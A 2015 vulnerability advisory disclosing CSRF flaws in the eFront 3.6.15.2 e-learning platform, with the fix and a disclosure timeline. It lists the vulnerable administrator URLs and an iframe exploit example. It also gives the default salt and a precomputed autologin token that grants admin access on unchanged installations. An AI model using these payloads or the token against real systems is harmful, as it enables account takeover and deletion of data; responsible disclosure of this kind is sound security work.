eFront 3.6.15.2 Cross Site Request Forgery

`Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)  
Advisory ID: SROEADV-2015-09  
Author: Steffen Rösemann  
Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014,  
build 18021)  
Vendor URL: http://www.efrontlearning.net  
Vendor Status: patched  
CVE-ID: -  
  
Tested with/on:  
  
-Browser: Firefox 35, Iceweasel 31.3.0  
-OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2,  
MySQL)  
  
==========================  
Vulnerability Description:  
==========================  
  
The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021)  
suffers from multiple CSRF vulnerabilities.  
  
==================  
Technical Details:  
==================  
  
The vulnerabilities can be found in different modules that are all used in  
the administrator.php file:  
  
ctg=modules (delete and deactivate/activate modules):  
  
http://  
{TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax  
  
ctg=users (delete and deactivate/activate users):  
  
http://  
{TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax  
  
ctg=themes (activate/deactivate and delete themes):  
  
http://  
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax  
  
ctg=digest (deactivate/activate and delete events, e.g. deactivate user  
registration, deactivate email for account activation)  
  
e.g. EVENT_ID 3 = user email activation  
e.g. EVENT_ID 4 = user registration  
  
http://  
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1  
  
ctg=languages (deactivate/activate and delete language settings)  
  
e.g. LANGUAGE_NAME = german  
  
http://  
{TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax  
http://  
{TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax  
  
  
Exploit-Example (valid for all above listed vulnerabilities):  
  
<iframe src="http://  
{TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1"></iframe>  
  
  
The following CSRF-vulnerability can be abused to activate/deactivate the  
auto-login feature of an arbitrary user:  
  
http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax  
  
  
That makes it possible to login via a URL in an arbitrary user-account like  
in the following example without providing any login-credentials:  
  
http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN}  
  
eFront creates three standard user-accounts while the installation process.  
One of it is the administrators account.  
  
The components being used for creating the auto-login token are the  
following informations:  
  
- a salt  
- the accounts creation date  
- the username  
  
The salt isn't generated dynamically during the installation. On a common  
eFront installation without any changes by the administrator, it has the  
value cDWQR#$Rcxsc. The admin accounts creation date has the standard value  
1365149958.  
  
As the standard administrators accountname is "admin", the auto-login token  
for the administrators account of eFront has always the value  
eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that  
none of the above mentioned values were changed after the installation.  
  
That makes it possible for an attacker to abuse the CSRF-vulnerability to  
gain access to the administrators account.  
  
  
  
=========  
Solution:  
=========  
  
Upgrade to eFront v. 3.6.15.3, build 18022.  
  
  
====================  
Disclosure Timeline:  
====================  
14/15-Jan-2015 – found the vulnerability  
15-Jan-2015 - informed the developers (see [3])  
15-Jan-2015 – release date of this security advisory [without technical  
details]  
15-Jan-2015 - vendor responded, announces a patch  
05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022)  
05-Feb-2015 - release date of this security advisory  
05-Feb-2015 - send to FullDisclosure  
  
  
========  
Credits:  
========  
  
Vulnerability found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] http://www.efrontlearning.net  
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-09.html  
[3] https://github.com/epignosis/efront_open_source/issues/7  
[4]  
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-09.html  
  
  
`